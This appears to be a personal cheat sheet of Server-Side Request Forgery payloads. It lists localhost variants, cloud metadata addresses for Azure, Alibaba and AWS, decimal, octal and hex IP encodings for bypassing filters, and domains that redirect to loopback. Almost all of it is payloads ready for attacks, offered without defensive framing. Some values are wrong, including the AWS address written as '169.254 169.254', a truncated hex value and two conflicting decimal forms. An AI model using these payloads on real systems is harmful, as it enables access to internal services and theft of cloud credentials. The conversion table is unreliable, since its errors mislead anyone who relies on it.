Server Side Request Forgery (SSRF)
Localhost
localhost
localhost:80
localhost:443
localhost:22
127.0.0.1
127.0.0.1:80
127.0.0.1:443
127.0.0.1:22
0.0.0.0
0.0.0.0:80
0.0.0.0:443
0.0.0.0:22
[::]:80
[::]:25
[::]:22
[::]:3128
[0000::1]:80
[0000::1]:25
[0000::1]:22
[0000::1]:3128
127.127.127.127
127.0.1.3
127.0.0.0
2130706433
0177.0.0.1
o177.0.0.1
0o177.0.0.1
q177.0.0.1
0
127.1
127.0.1
127.0.0.0
127.0.1.1
127.1.1.1
127.127.127.127
::1
ip6-localhost
ip6-loopback
[0:0:0:0:0:ffff:127.0.0.1]
[::ffff:127.0.0.1]
0x7f.0.0.1
local0.michalszalkowski.com
local1.michalszalkowski.com
local2.michalszalkowski.com
local3.michalszalkowski.com
local4.michalszalkowski.com
local5.michalszalkowski.com
local6.michalszalkowski.com
local7.michalszalkowski.com
local8.michalszalkowski.com
local9.michalszalkowski.com
r1.michalszalkowski.com
168.63.129.16
100.100.100.200
169.254 169.254
2822734096
1684301000
2852060672
025017700420
014431062310
025177577000
a83f8110
646464c8
a9fefe
| What | IP | Decimal | Octal | Hex |
| Azure | 168.63.129.16 | 2822734096 | 025017700420 | a83f8110 |
| Alibaba | 100.100.100.200 | 1684301000 | 014431062310 | 646464c8 |
| AWS | 169.254 169.254 | 2852060672 | 025177577000 | a9fefe |
Bypass using a decimal IP
text
2130706433
3232235521
3232235777
2852039166
| IP | Decimal |
| http://127.0.0.1 | http://2130706433 |
| http://192.168.0.1 | http://3232235521 |
| http://192.168.1.1 | http://3232235777 |
| http://169.254.169.254 | http://2852039166 |
Bypass using a octal IP
0177.0.0.1
0300.0250.0.1
0300.0250.1.1
0251.0376.0251.0376
| IP | Decimal |
| http://127.0.0.1 | http://0177.0.0.1 |
| http://192.168.0.1 | http://0300.0250.0.1 |
| http://192.168.1.1 | http://0300.0250.1.1 |
| http://169.254.169.254 | http://0251.0376.0251.0376 |
Bypass using a hex IP
| IP | Hex |
| http://127.0.0.1 | http://0x7f.0.0.1 |
Bypass localhost with a domain redirection
local0.michalszalkowski.com
local1.michalszalkowski.com
local2.michalszalkowski.com
local3.michalszalkowski.com
local4.michalszalkowski.com
local5.michalszalkowski.com
local6.michalszalkowski.com
local7.michalszalkowski.com
local8.michalszalkowski.com
local9.michalszalkowski.com
r1.michalszalkowski.com
| Domain | IP |
| local0.michalszalkowski.com | 127.0.0.0 |
| local1.michalszalkowski.com | 127.0.0.1 |
| local2.michalszalkowski.com | 127.0.1.1 |
| local3.michalszalkowski.com | 127.1.1.1 |
| local4.michalszalkowski.com | 0.0.0.0 |
| local5.michalszalkowski.com | localhost |
| local6.michalszalkowski.com | ::1 |
| local7.michalszalkowski.com | ip6-localhost |
| local8.michalszalkowski.com | ip6-loopback |
| local9.michalszalkowski.com | 127.127.127.127 |
| r1.michalszalkowski.com -> r2.michalszalkowski.com -> r3.michalszalkowski.com -> r4.michalszalkowski.com -> r5.michalszalkowski.com | 127.0.0.1 |
More
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md#payloads-with-localhost